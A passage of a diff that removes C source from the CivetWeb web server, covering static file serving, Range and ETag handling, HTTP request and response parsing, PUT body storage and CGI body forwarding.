-				    (size_t)((len < 0x7FFFF000) ? len : 0x7FFFF000);
-				sf_sent =
-				    sendfile(conn->client.sock, sf_file, &sf_offs, sf_tosend);
-				if (sf_sent > 0) {
-					len -= sf_sent;
-					offset += sf_sent;
-				} else if (loop_cnt == 0) {
-					/* This file can not be sent using sendfile.
-					 * This might be the case for pseudo-files in the
-					 * /sys/ and /proc/ file system.
-					 * Use the regular user mode copy code instead. */
-					break;
-				} else if (sf_sent == 0) {
-					/* No error, but 0 bytes sent. May be EOF? */
-					return;
-				}
-				loop_cnt++;
-
-			} while ((len > 0) && (sf_sent >= 0));
-
-			if (sf_sent > 0) {
-				return; /* OK */
-			}
-
-			/* sf_sent<0 means error, thus fall back to the classic way */
-			/* This is always the case, if sf_file is not a "normal" file,
-			 * e.g., for sending data from the output of a CGI process. */
-			offset = (int64_t)sf_offs;
-		}
-#endif
-		if ((offset > 0) && (fseeko(filep->access.fp, offset, SEEK_SET) != 0)) {
-			mg_cry(conn, "%s: fseeko() failed: %s", __func__, strerror(ERRNO));
-			mg_send_http_error(
-			    conn,
-			    500,
-			    "%s",
-			    "Error: Unable to access file at requested position.");
-		} else {
-			while (len > 0) {
-				/* Calculate how much to read from the file in the buffer */
-				to_read = sizeof(buf);
-				if ((int64_t)to_read > len) {
-					to_read = (int)len;
-				}
-
-				/* Read from file, exit the loop on error */
-				if ((num_read =
-				         (int)fread(buf, 1, (size_t)to_read, filep->access.fp))
-				    <= 0) {
-					break;
-				}
-
-				/* Send read bytes to the client, exit the loop on error */
-				if ((num_written = mg_write(conn, buf, (size_t)num_read))
-				    != num_read) {
-					break;
-				}
-
-				/* Both read and were successful, adjust counters */
-				len -= num_written;
-			}
-		}
-	}
-}
-
-
-static int
-parse_range_header(const char *header, int64_t *a, int64_t *b)
-{
-	return sscanf(header, "bytes=%" INT64_FMT "-%" INT64_FMT, a, b);
-}
-
-
-static void
-construct_etag(char *buf, size_t buf_len, const struct mg_file_stat *filestat)
-{
-	if ((filestat != NULL) && (buf != NULL)) {
-		mg_snprintf(NULL,
-		            NULL, /* All calls to construct_etag use 64 byte buffer */
-		            buf,
-		            buf_len,
-		            "\"%lx.%" INT64_FMT "\"",
-		            (unsigned long)filestat->last_modified,
-		            filestat->size);
-	}
-}
-
-
-static void
-fclose_on_exec(struct mg_file_access *filep, struct mg_connection *conn)
-{
-	if (filep != NULL && filep->fp != NULL) {
-#ifdef _WIN32
-		(void)conn; /* Unused. */
-#else
-		if (fcntl(fileno(filep->fp), F_SETFD, FD_CLOEXEC) != 0) {
-			mg_cry(conn,
-			       "%s: fcntl(F_SETFD FD_CLOEXEC) failed: %s",
-			       __func__,
-			       strerror(ERRNO));
-		}
-#endif
-	}
-}
-
-
-static void
-handle_static_file_request(struct mg_connection *conn,
-                           const char *path,
-                           struct mg_file *filep,
-                           const char *mime_type,
-                           const char *additional_headers)
-{
-	char date[64], lm[64], etag[64];
-	char range[128]; /* large enough, so there will be no overflow */
-	const char *msg = "OK", *hdr;
-	time_t curtime = time(NULL);
-	int64_t cl, r1, r2;
-	struct vec mime_vec;
-	int n, truncated;
-	char gz_path[PATH_MAX];
-	const char *encoding = "";
-	const char *cors1, *cors2, *cors3;
-	int allow_on_the_fly_compression;
-
-	if ((conn == NULL) || (conn->ctx == NULL) || (filep == NULL)) {
-		return;
-	}
-
-	if (mime_type == NULL) {
-		get_mime_type(conn->ctx, path, &mime_vec);
-	} else {
-		mime_vec.ptr = mime_type;
-		mime_vec.len = strlen(mime_type);
-	}
-	if (filep->stat.size > INT64_MAX) {
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: File size is too large to send\n%" INT64_FMT,
-		                   filep->stat.size);
-		return;
-	}
-	cl = (int64_t)filep->stat.size;
-	conn->status_code = 200;
-	range[0] = '\0';
-
-	/* if this file is in fact a pre-gzipped file, rewrite its filename
-	 * it's important to rewrite the filename after resolving
-	 * the mime type from it, to preserve the actual file's type */
-	allow_on_the_fly_compression = conn->accept_gzip;
-
-	if (filep->stat.is_gzipped) {
-		mg_snprintf(conn, &truncated, gz_path, sizeof(gz_path), "%s.gz", path);
-
-		if (truncated) {
-			mg_send_http_error(conn,
-			                   500,
-			                   "Error: Path of zipped file too long (%s)",
-			                   path);
-			return;
-		}
-
-		path = gz_path;
-		encoding = "Content-Encoding: gzip\r\n";
-
-		/* File is already compressed. No "on the fly" compression. */
-		allow_on_the_fly_compression = 0;
-	}
-
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_READ, filep)) {
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot open file\nfopen(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	fclose_on_exec(&filep->access, conn);
-
-	/* If Range: header specified, act accordingly */
-	r1 = r2 = 0;
-	hdr = mg_get_header(conn, "Range");
-	if ((hdr != NULL) && ((n = parse_range_header(hdr, &r1, &r2)) > 0)
-	    && (r1 >= 0) && (r2 >= 0)) {
-		/* actually, range requests don't play well with a pre-gzipped
-		 * file (since the range is specified in the uncompressed space) */
-		if (filep->stat.is_gzipped) {
-			mg_send_http_error(
-			    conn,
-			    416, /* 416 = Range Not Satisfiable */
-			    "%s",
-			    "Error: Range requests in gzipped files are not supported");
-			(void)mg_fclose(
-			    &filep->access); /* ignore error on read only file */
-			return;
-		}
-		conn->status_code = 206;
-		cl = (n == 2) ? (((r2 > cl) ? cl : r2) - r1 + 1) : (cl - r1);
-		mg_snprintf(conn,
-		            NULL, /* range buffer is big enough */
-		            range,
-		            sizeof(range),
-		            "Content-Range: bytes "
-		            "%" INT64_FMT "-%" INT64_FMT "/%" INT64_FMT "\r\n",
-		            r1,
-		            r1 + cl - 1,
-		            filep->stat.size);
-		msg = "Partial Content";
-
-		/* Do not compress ranges. */
-		allow_on_the_fly_compression = 0;
-	}
-
-	hdr = mg_get_header(conn, "Origin");
-	if (hdr) {
-		/* Cross-origin resource sharing (CORS), see
-		 * http://www.html5rocks.com/en/tutorials/cors/,
-		 * http://www.html5rocks.com/static/images/cors_server_flowchart.png
-		 * -
-		 * preflight is not supported for files. */
-		cors1 = "Access-Control-Allow-Origin: ";
-		cors2 = conn->ctx->config[ACCESS_CONTROL_ALLOW_ORIGIN];
-		cors3 = "\r\n";
-	} else {
-		cors1 = cors2 = cors3 = "";
-	}
-
-	/* Prepare Etag, Date, Last-Modified headers. Must be in UTC,
-	 * according to
-	 * http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.3 */
-	gmt_time_string(date, sizeof(date), &curtime);
-	gmt_time_string(lm, sizeof(lm), &filep->stat.last_modified);
-	construct_etag(etag, sizeof(etag), &filep->stat);
-
-	/* On the fly compression allowed */
-	if (allow_on_the_fly_compression) {
-		;
-		/* TODO: add interface to compression module */
-		/* e.g., def from https://zlib.net/zlib_how.html */
-		/* Check license (zlib has a permissive license, but */
-		/* is still not MIT) and use dynamic binding like */
-		/* done with OpenSSL */
-		/* See #199 (https://github.com/civetweb/civetweb/issues/199) */
-	}
-
-	/* Send header */
-	(void)mg_printf(conn,
-	                "HTTP/1.1 %d %s\r\n"
-	                "%s%s%s"
-	                "Date: %s\r\n",
-	                conn->status_code,
-	                msg,
-	                cors1,
-	                cors2,
-	                cors3,
-	                date);
-	send_static_cache_header(conn);
-	send_additional_header(conn);
-
-	(void)mg_printf(conn,
-	                "Last-Modified: %s\r\n"
-	                "Etag: %s\r\n"
-	                "Content-Type: %.*s\r\n"
-	                "Content-Length: %" INT64_FMT "\r\n"
-	                "Connection: %s\r\n"
-	                "Accept-Ranges: bytes\r\n"
-	                "%s%s",
-	                lm,
-	                etag,
-	                (int)mime_vec.len,
-	                mime_vec.ptr,
-	                cl,
-	                suggest_connection_header(conn),
-	                range,
-	                encoding);
-
-	/* The previous code must not add any header starting with X- to make
-	 * sure no one of the additional_headers is included twice */
-
-	if (additional_headers != NULL) {
-		(void)mg_printf(conn,
-		                "%.*s\r\n\r\n",
-		                (int)strlen(additional_headers),
-		                additional_headers);
-	} else {
-		(void)mg_printf(conn, "\r\n");
-	}
-
-	if (strcmp(conn->request_info.request_method, "HEAD") != 0) {
-		send_file_data(conn, filep, r1, cl);
-	}
-	(void)mg_fclose(&filep->access); /* ignore error on read only file */
-}
-
-
-#if !defined(NO_CACHING)
-static void
-handle_not_modified_static_file_request(struct mg_connection *conn,
-                                        struct mg_file *filep)
-{
-	char date[64], lm[64], etag[64];
-	time_t curtime = time(NULL);
-
-	if ((conn == NULL) || (filep == NULL)) {
-		return;
-	}
-	conn->status_code = 304;
-	gmt_time_string(date, sizeof(date), &curtime);
-	gmt_time_string(lm, sizeof(lm), &filep->stat.last_modified);
-	construct_etag(etag, sizeof(etag), &filep->stat);
-
-	(void)mg_printf(conn,
-	                "HTTP/1.1 %d %s\r\n"
-	                "Date: %s\r\n",
-	                conn->status_code,
-	                mg_get_response_code_text(conn, conn->status_code),
-	                date);
-	send_static_cache_header(conn);
-	send_additional_header(conn);
-	(void)mg_printf(conn,
-	                "Last-Modified: %s\r\n"
-	                "Etag: %s\r\n"
-	                "Connection: %s\r\n"
-	                "\r\n",
-	                lm,
-	                etag,
-	                suggest_connection_header(conn));
-}
-#endif
-
-
-void
-mg_send_file(struct mg_connection *conn, const char *path)
-{
-	mg_send_mime_file(conn, path, NULL);
-}
-
-
-void
-mg_send_mime_file(struct mg_connection *conn,
-                  const char *path,
-                  const char *mime_type)
-{
-	mg_send_mime_file2(conn, path, mime_type, NULL);
-}
-
-
-void
-mg_send_mime_file2(struct mg_connection *conn,
-                   const char *path,
-                   const char *mime_type,
-                   const char *additional_headers)
-{
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-
-	if (!conn) {
-		/* No conn */
-		return;
-	}
-
-	if (mg_stat(conn, path, &file.stat)) {
-		if (file.stat.is_directory) {
-			if (!mg_strcasecmp(conn->ctx->config[ENABLE_DIRECTORY_LISTING],
-			                   "yes")) {
-				handle_directory_request(conn, path);
-			} else {
-				mg_send_http_error(conn,
-				                   403,
-				                   "%s",
-				                   "Error: Directory listing denied");
-			}
-		} else {
-			handle_static_file_request(
-			    conn, path, &file, mime_type, additional_headers);
-		}
-	} else {
-		mg_send_http_error(conn, 404, "%s", "Error: File not found");
-	}
-}
-
-
-/* For a given PUT path, create all intermediate subdirectories.
- * Return  0  if the path itself is a directory.
- * Return  1  if the path leads to a file.
- * Return -1  for if the path is too long.
- * Return -2  if path can not be created.
-*/
-static int
-put_dir(struct mg_connection *conn, const char *path)
-{
-	char buf[PATH_MAX];
-	const char *s, *p;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	size_t len;
-	int res = 1;
-
-	for (s = p = path + 2; (p = strchr(s, '/')) != NULL; s = ++p) {
-		len = (size_t)(p - path);
-		if (len >= sizeof(buf)) {
-			/* path too long */
-			res = -1;
-			break;
-		}
-		memcpy(buf, path, len);
-		buf[len] = '\0';
-
-		/* Try to create intermediate directory */
-		DEBUG_TRACE("mkdir(%s)", buf);
-		if (!mg_stat(conn, buf, &file.stat) && mg_mkdir(conn, buf, 0755) != 0) {
-			/* path does not exixt and can not be created */
-			res = -2;
-			break;
-		}
-
-		/* Is path itself a directory? */
-		if (p[1] == '\0') {
-			res = 0;
-		}
-	}
-
-	return res;
-}
-
-
-static void
-remove_bad_file(const struct mg_connection *conn, const char *path)
-{
-	int r = mg_remove(conn, path);
-	if (r != 0) {
-		mg_cry(conn, "%s: Cannot remove invalid file %s", __func__, path);
-	}
-}
-
-
-long long
-mg_store_body(struct mg_connection *conn, const char *path)
-{
-	char buf[MG_BUF_LEN];
-	long long len = 0;
-	int ret, n;
-	struct mg_file fi;
-
-	if (conn->consumed_content != 0) {
-		mg_cry(conn, "%s: Contents already consumed", __func__);
-		return -11;
-	}
-
-	ret = put_dir(conn, path);
-	if (ret < 0) {
-		/* -1 for path too long,
-		 * -2 for path can not be created. */
-		return ret;
-	}
-	if (ret != 1) {
-		/* Return 0 means, path itself is a directory. */
-		return 0;
-	}
-
-	if (mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &fi) == 0) {
-		return -12;
-	}
-
-	ret = mg_read(conn, buf, sizeof(buf));
-	while (ret > 0) {
-		n = (int)fwrite(buf, 1, (size_t)ret, fi.access.fp);
-		if (n != ret) {
-			(void)mg_fclose(
-			    &fi.access); /* File is bad and will be removed anyway. */
-			remove_bad_file(conn, path);
-			return -13;
-		}
-		len += ret;
-		ret = mg_read(conn, buf, sizeof(buf));
-	}
-
-	/* File is open for writing. If fclose fails, there was probably an
-	 * error flushing the buffer to disk, so the file on disk might be
-	 * broken. Delete it and return an error to the caller. */
-	if (mg_fclose(&fi.access) != 0) {
-		remove_bad_file(conn, path);
-		return -14;
-	}
-
-	return len;
-}
-
-
-/* Parse a buffer:
- * Forward the string pointer till the end of a word, then
- * terminate it and forward till the begin of the next word.
- */
-static int
-skip_to_end_of_word_and_terminate(char **ppw, int eol)
-{
-	/* Forward until a space is found - use isgraph here */
-	/* See http://www.cplusplus.com/reference/cctype/ */
-	while (isgraph(**ppw)) {
-		(*ppw)++;
-	}
-
-	/* Check end of word */
-	if (eol) {
-		/* must be a end of line */
-		if ((**ppw != '\r') && (**ppw != '\n')) {
-			return -1;
-		}
-	} else {
-		/* must be a end of a word, but not a line */
-		if (**ppw != ' ') {
-			return -1;
-		}
-	}
-
-	/* Terminate and forward to the next word */
-	do {
-		**ppw = 0;
-		(*ppw)++;
-	} while ((**ppw) && isspace(**ppw));
-
-	/* Check after term */
-	if (!eol) {
-		/* if it's not the end of line, there must be a next word */
-		if (!isgraph(**ppw)) {
-			return -1;
-		}
-	}
-
-	/* ok */
-	return 1;
-}
-
-
-/* Parse HTTP headers from the given buffer, advance buf pointer
- * to the point where parsing stopped.
- * All parameters must be valid pointers (not NULL).
- * Return <0 on error. */
-static int
-parse_http_headers(char **buf, struct mg_header hdr[MG_MAX_HEADERS])
-{
-	int i;
-	int num_headers = 0;
-
-	for (i = 0; i < (int)MG_MAX_HEADERS; i++) {
-		char *dp = *buf;
-		while ((*dp != ':') && (*dp >= 33) && (*dp <= 126)) {
-			dp++;
-		}
-		if (dp == *buf) {
-			/* End of headers reached. */
-			break;
-		}
-		if (*dp != ':') {
-			/* This is not a valid field. */
-			return -1;
-		}
-
-		/* End of header key (*dp == ':') */
-		/* Truncate here and set the key name */
-		*dp = 0;
-		hdr[i].name = *buf;
-		do {
-			dp++;
-		} while (*dp == ' ');
-
-		/* The rest of the line is the value */
-		hdr[i].value = dp;
-		*buf = dp + strcspn(dp, "\r\n");
-		if (((*buf)[0] != '\r') || ((*buf)[1] != '\n')) {
-			*buf = NULL;
-		}
-
-		num_headers = i + 1;
-		if (*buf) {
-			(*buf)[0] = 0;
-			(*buf)[1] = 0;
-			*buf += 2;
-		} else {
-			*buf = dp;
-			break;
-		}
-
-		if ((*buf)[0] == '\r') {
-			/* This is the end of the header */
-			break;
-		}
-	}
-	return num_headers;
-}
-
-
-struct mg_http_method_info {
-	const char *name;
-	int request_has_body;
-	int response_has_body;
-	int is_safe;
-	int is_idempotent;
-	int is_cacheable;
-};
-
-
-/* https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods */
-static struct mg_http_method_info http_methods[] = {
-    /* HTTP (RFC 2616) */
-    {"GET", 0, 1, 1, 1, 1},
-    {"POST", 1, 1, 0, 0, 0},
-    {"PUT", 1, 0, 0, 1, 0},
-    {"DELETE", 0, 0, 0, 1, 0},
-    {"HEAD", 0, 0, 1, 1, 1},
-    {"OPTIONS", 0, 0, 1, 1, 0},
-    {"CONNECT", 1, 1, 0, 0, 0},
-    /* TRACE method (RFC 2616) is not supported for security reasons */
-
-    /* PATCH method (RFC 5789) */
-    {"PATCH", 1, 0, 0, 0, 0},
-    /* PATCH method only allowed for CGI/Lua/LSP and callbacks. */
-
-    /* WEBDAV (RFC 2518) */
-    {"PROPFIND", 0, 1, 1, 1, 0},
-    /* http://www.webdav.org/specs/rfc4918.html, 9.1:
-     * Some PROPFIND results MAY be cached, with care,
-     * as there is no cache validation mechanism for
-     * most properties. This method is both safe and
-     * idempotent (see Section 9.1 of [RFC2616]). */
-    {"MKCOL", 0, 0, 0, 1, 0},
-    /* http://www.webdav.org/specs/rfc4918.html, 9.1:
-     * When MKCOL is invoked without a request body,
-     * the newly created collection SHOULD have no
-     * members. A MKCOL request message may contain
-     * a message body. The precise behavior of a MKCOL
-     * request when the body is present is undefined,
-     * ... ==> We do not support MKCOL with body data.
-     * This method is idempotent, but not safe (see
-     * Section 9.1 of [RFC2616]). Responses to this
-     * method MUST NOT be cached. */
-
-    /* Unsupported WEBDAV Methods: */
-    /* PROPPATCH, COPY, MOVE, LOCK, UNLOCK (RFC 2518) */
-    /* + 11 methods from RFC 3253 */
-    /* ORDERPATCH (RFC 3648) */
-    /* ACL (RFC 3744) */
-    /* SEARCH (RFC 5323) */
-    /* + MicroSoft extensions
-     * https://msdn.microsoft.com/en-us/library/aa142917.aspx */
-
-    /* REPORT method (RFC 3253) */
-    {"REPORT", 1, 1, 1, 1, 1},
-    /* REPORT method only allowed for CGI/Lua/LSP and callbacks. */
-    /* It was defined for WEBDAV in RFC 3253, Sec. 3.6
-     * (https://tools.ietf.org/html/rfc3253#section-3.6), but seems
-     * to be useful for REST in case a "GET request with body" is
-     * required. */
-
-    {NULL, 0, 0, 0, 0, 0}
-    /* end of list */
-};
-
-
-static const struct mg_http_method_info *
-get_http_method_info(const char *method)
-{
-	/* Check if the method is known to the server. The list of all known
-	 * HTTP methods can be found here at
-	 * http://www.iana.org/assignments/http-methods/http-methods.xhtml
-	 */
-	const struct mg_http_method_info *m = http_methods;
-
-	while (m->name) {
-		if (!strcmp(m->name, method)) {
-			return m;
-		}
-		m++;
-	}
-	return NULL;
-}
-
-
-static int
-is_valid_http_method(const char *method)
-{
-	return (get_http_method_info(method) != NULL);
-}
-
-
-/* Parse HTTP request, fill in mg_request_info structure.
- * This function modifies the buffer by NUL-terminating
- * HTTP request components, header names and header values.
- * Parameters:
- *   buf (in/out): pointer to the HTTP header to parse and split
- *   len (in): length of HTTP header buffer
- *   re (out): parsed header as mg_request_info
- * buf and ri must be valid pointers (not NULL), len>0.
- * Returns <0 on error. */
-static int
-parse_http_request(char *buf, int len, struct mg_request_info *ri)
-{
-	int request_length;
-	int init_skip = 0;
-
-	/* Reset attributes. DO NOT TOUCH is_ssl, remote_ip, remote_addr,
-	 * remote_port */
-	ri->remote_user = ri->request_method = ri->request_uri = ri->http_version =
-	    NULL;
-	ri->num_headers = 0;
-
-	/* RFC says that all initial whitespaces should be ingored */
-	/* This included all leading \r and \n (isspace) */
-	/* See table: http://www.cplusplus.com/reference/cctype/ */
-	while ((len > 0) && isspace(*(unsigned char *)buf)) {
-		buf++;
-		len--;
-		init_skip++;
-	}
-
-	if (len == 0) {
-		/* Incomplete request */
-		return 0;
-	}
-
-	/* Control characters are not allowed, including zero */
-	if (iscntrl(*(unsigned char *)buf)) {
-		return -1;
-	}
-
-	/* Find end of HTTP header */
-	request_length = get_http_header_len(buf, len);
-	if (request_length <= 0) {
-		return request_length;
-	}
-	buf[request_length - 1] = '\0';
-
-	if ((*buf == 0) || (*buf == '\r') || (*buf == '\n')) {
-		return -1;
-	}
-
-	/* The first word has to be the HTTP method */
-	ri->request_method = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 0) <= 0) {
-		return -1;
-	}
-
-	/* Check for a valid http method */
-	if (!is_valid_http_method(ri->request_method)) {
-		return -1;
-	}
-
-	/* The second word is the URI */
-	ri->request_uri = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 0) <= 0) {
-		return -1;
-	}
-
-	/* Next would be the HTTP version */
-	ri->http_version = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 1) <= 0) {
-		return -1;
-	}
-
-	/* Check for a valid HTTP version key */
-	if (strncmp(ri->http_version, "HTTP/", 5) != 0) {
-		/* Invalid request */
-		return -1;
-	}
-	ri->http_version += 5;
-
-
-	/* Parse all HTTP headers */
-	ri->num_headers = parse_http_headers(&buf, ri->http_headers);
-	if (ri->num_headers < 0) {
-		/* Error while parsing headers */
-		return -1;
-	}
-
-	return request_length + init_skip;
-}
-
-
-static int
-parse_http_response(char *buf, int len, struct mg_response_info *ri)
-{
-	int response_length;
-	int init_skip = 0;
-	char *tmp, *tmp2;
-	long l;
-
-	/* Initialize elements. */
-	ri->http_version = ri->status_text = NULL;
-	ri->num_headers = ri->status_code = 0;
-
-	/* RFC says that all initial whitespaces should be ingored */
-	/* This included all leading \r and \n (isspace) */
-	/* See table: http://www.cplusplus.com/reference/cctype/ */
-	while ((len > 0) && isspace(*(unsigned char *)buf)) {
-		buf++;
-		len--;
-		init_skip++;
-	}
-
-	if (len == 0) {
-		/* Incomplete request */
-		return 0;
-	}
-
-	/* Control characters are not allowed, including zero */
-	if (iscntrl(*(unsigned char *)buf)) {
-		return -1;
-	}
-
-	/* Find end of HTTP header */
-	response_length = get_http_header_len(buf, len);
-	if (response_length <= 0) {
-		return response_length;
-	}
-	buf[response_length - 1] = '\0';
-
-
-	/* TODO: Define mg_response_info and implement parsing */
-	(void)buf;
-	(void)len;
-	(void)ri;
-
-	/* RFC says that all initial whitespaces should be ingored */
-	while ((*buf != '\0') && isspace(*(unsigned char *)buf)) {
-		buf++;
-	}
-	if ((*buf == 0) || (*buf == '\r') || (*buf == '\n')) {
-		return -1;
-	}
-
-	/* The first word is the HTTP version */
-	/* Check for a valid HTTP version key */
-	if (strncmp(buf, "HTTP/", 5) != 0) {
-		/* Invalid request */
-		return -1;
-	}
-	buf += 5;
-	if (!isgraph(buf[0])) {
-		/* Invalid request */
-		return -1;
-	}
-	ri->http_version = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 0) <= 0) {
-		return -1;
-	}
-
-	/* The second word is the status as a number */
-	tmp = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 0) <= 0) {
-		return -1;
-	}
-
-	l = strtol(tmp, &tmp2, 10);
-	if ((l < 100) || (l >= 1000) || ((tmp2 - tmp) != 3) || (*tmp2 != 0)) {
-		/* Everything else but a 3 digit code is invalid */
-		return -1;
-	}
-	ri->status_code = (int)l;
-
-	/* The rest of the line is the status text */
-	ri->status_text = buf;
-
-	/* Find end of status text */
-	/* isgraph or isspace = isprint */
-	while (isprint(*buf)) {
-		buf++;
-	}
-	if ((*buf != '\r') && (*buf != '\n')) {
-		return -1;
-	}
-	/* Terminate string and forward buf to next line */
-	do {
-		*buf = 0;
-		buf++;
-	} while ((*buf) && isspace(*buf));
-
-
-	/* Parse all HTTP headers */
-	ri->num_headers = parse_http_headers(&buf, ri->http_headers);
-	if (ri->num_headers < 0) {
-		/* Error while parsing headers */
-		return -1;
-	}
-
-	return response_length + init_skip;
-}
-
-
-/* Keep reading the input (either opened file descriptor fd, or socket sock,
- * or SSL descriptor ssl) into buffer buf, until \r\n\r\n appears in the
- * buffer (which marks the end of HTTP request). Buffer buf may already
- * have some data. The length of the data is stored in nread.
- * Upon every read operation, increase nread by the number of bytes read. */
-static int
-read_message(FILE *fp,
-             struct mg_connection *conn,
-             char *buf,
-             int bufsiz,
-             int *nread)
-{
-	int request_len, n = 0;
-	struct timespec last_action_time;
-	double request_timeout;
-
-	if (!conn) {
-		return 0;
-	}
-
-	memset(&last_action_time, 0, sizeof(last_action_time));
-
-	if (conn->ctx->config[REQUEST_TIMEOUT]) {
-		/* value of request_timeout is in seconds, config in milliseconds */
-		request_timeout = atof(conn->ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	} else {
-		request_timeout = -1.0;
-	}
-	if (conn->handled_requests > 0) {
-		if (conn->ctx->config[KEEP_ALIVE_TIMEOUT]) {
-			request_timeout =
-			    atof(conn->ctx->config[KEEP_ALIVE_TIMEOUT]) / 1000.0;
-		}
-	}
-
-	request_len = get_http_header_len(buf, *nread);
-
-	/* first time reading from this connection */
-	clock_gettime(CLOCK_MONOTONIC, &last_action_time);
-
-	while (request_len == 0) {
-		/* Full request not yet received */
-		if (conn->ctx->stop_flag != 0) {
-			/* Server is to be stopped. */
-			return -1;
-		}
-
-		if (*nread >= bufsiz) {
-			/* Request too long */
-			return -2;
-		}
-
-		n = pull_inner(
-		    fp, conn, buf + *nread, bufsiz - *nread, request_timeout);
-		if (n == -2) {
-			/* Receive error */
-			return -1;
-		}
-		if (n > 0) {
-			*nread += n;
-			request_len = get_http_header_len(buf, *nread);
-		} else {
-			request_len = 0;
-		}
-
-		if ((request_len == 0) && (request_timeout >= 0)) {
-			if (mg_difftimespec(&last_action_time, &(conn->req_time))
-			    > request_timeout) {
-				/* Timeout */
-				return -1;
-			}
-			clock_gettime(CLOCK_MONOTONIC, &last_action_time);
-		}
-	}
-
-	return request_len;
-}
-
-
-#if !defined(NO_CACHING)
-/* Return True if we should reply 304 Not Modified. */
-static int
-is_not_modified(const struct mg_connection *conn,
-                const struct mg_file_stat *filestat)
-{
-	char etag[64];
-	const char *ims = mg_get_header(conn, "If-Modified-Since");
-	const char *inm = mg_get_header(conn, "If-None-Match");
-	construct_etag(etag, sizeof(etag), filestat);
-
-	return ((inm != NULL) && !mg_strcasecmp(etag, inm))
-	       || ((ims != NULL)
-	           && (filestat->last_modified <= parse_date_string(ims)));
-}
-#endif /* !NO_CACHING */
-
-
-#if !defined(NO_CGI) || !defined(NO_FILES)
-static int
-forward_body_data(struct mg_connection *conn, FILE *fp, SOCKET sock, SSL *ssl)
-{
-	const char *expect, *body;
-	char buf[MG_BUF_LEN];
-	int to_read, nread, success = 0;
-	int64_t buffered_len;
-	double timeout = -1.0;
-
-	if (!conn) {
-		return 0;
-	}
-	if (conn->ctx->config[REQUEST_TIMEOUT]) {
-		timeout = atoi(conn->ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	}
-
-	expect = mg_get_header(conn, "Expect");
-	/* assert(fp != NULL); */
-	if (!fp) {
-		mg_send_http_error(conn, 500, "%s", "Error: NULL File");
-		return 0;
-	}
-
-	if ((conn->content_len == -1) && (!conn->is_chunked)) {
-		/* Content length is not specified by the client. */
-		mg_send_http_error(conn,
-		                   411,
-		                   "%s",
-		                   "Error: Client did not specify content length");
-	} else if ((expect != NULL)
-	           && (mg_strcasecmp(expect, "100-continue") != 0)) {
-		/* Client sent an "Expect: xyz" header and xyz is not 100-continue.
-		 */
-		mg_send_http_error(conn,
-		                   417,
-		                   "Error: Can not fulfill expectation %s",
-		                   expect);
-	} else {
-		if (expect != NULL) {
-			(void)mg_printf(conn, "%s", "HTTP/1.1 100 Continue\r\n\r\n");
-			conn->status_code = 100;
-		} else {
-			conn->status_code = 200;
-		}
-
-		buffered_len = (int64_t)(conn->data_len) - (int64_t)conn->request_len
-		               - conn->consumed_content;
-
-		/* assert(buffered_len >= 0); */
-		/* assert(conn->consumed_content == 0); */
-
-		if ((buffered_len < 0) || (conn->consumed_content != 0)) {
-			mg_send_http_error(conn, 500, "%s", "Error: Size mismatch");
-			return 0;
-		}
-
-		if (buffered_len > 0) {
-			if ((int64_t)buffered_len > conn->content_len) {
-				buffered_len = (int)conn->content_len;
-			}
-			body = conn->buf + conn->request_len + conn->consumed_content;
-			push_all(conn->ctx, fp, sock, ssl, body, (int64_t)buffered_len);
-			conn->consumed_content += buffered_len;
-		}
-
-		nread = 0;
-		while (conn->consumed_content < conn->content_len) {
-			to_read = sizeof(buf);
-			if ((int64_t)to_read > conn->content_len - conn->consumed_content) {
-				to_read = (int)(conn->content_len - conn->consumed_content);
-			}
-			nread = pull_inner(NULL, conn, buf, to_read, timeout);
-			if (nread == -2) {
-				/* error */
-				break;
-			}
-			if (nread > 0) {
-				if (push_all(conn->ctx, fp, sock, ssl, buf, nread) != nread) {
-					break;
-				}
-			}
-			conn->consumed_content += nread;
-		}
-
-		if (conn->consumed_content == conn->content_len) {
-			success = (nread >= 0);
-		}
-
-		/* Each error code path in this function must send an error */
-		if (!success) {
-			/* NOTE: Maybe some data has already been sent. */
-			/* TODO (low): If some data has been sent, a correct error
-			 * reply can no longer be sent, so just close the connection */
-			mg_send_http_error(conn, 500, "%s", "");
-		}
-	}
-
-	return success;
-}
-#endif
-
-#if !defined(NO_CGI)
-/* This structure helps to create an environment for the spawned CGI
- * program.
- * Environment is an array of "VARIABLE=VALUE\0" ASCIIZ strings,
- * last element must be NULL.
- * However, on Windows there is a requirement that all these
- * VARIABLE=VALUE\0
- * strings must reside in a contiguous buffer. The end of the buffer is
- * marked by two '\0' characters.
- * We satisfy both worlds: we create an envp array (which is vars), all
- * entries are actually pointers inside buf. */
-struct cgi_environment {
-	struct mg_connection *conn;
-	/* Data block */
-	char *buf;      /* Environment buffer */
-	size_t buflen;  /* Space available in buf */
-	size_t bufused; /* Space taken in buf */
-	                /* Index block */
-	char **var;     /* char **envp */
-	size_t varlen;  /* Number of variables available in var */
-	size_t varused; /* Number of variables stored in var */
-};
-
-
-static void addenv(struct cgi_environment *env,
-                   PRINTF_FORMAT_STRING(const char *fmt),
-                   ...) PRINTF_ARGS(2, 3);
-
-/* Append VARIABLE=VALUE\0 string to the buffer, and add a respective
- * pointer into the vars array. Assumes env != NULL and fmt != NULL. */
-static void
-addenv(struct cgi_environment *env, const char *fmt, ...)
-{
-	size_t n, space;
-	int truncated = 0;
-	char *added;
-	va_list ap;
-
-	/* Calculate how much space is left in the buffer */
-	space = (env->buflen - env->bufused);
-
-	/* Calculate an estimate for the required space */
-	n = strlen(fmt) + 2 + 128;
-
-	do {
-		if (space <= n) {
-			/* Allocate new buffer */
-			n = env->buflen + CGI_ENVIRONMENT_SIZE;
-			added = (char *)mg_realloc_ctx(env->buf, n, env->conn->ctx);
-			if (!added) {
-				/* Out of memory */
-				mg_cry(env->conn,
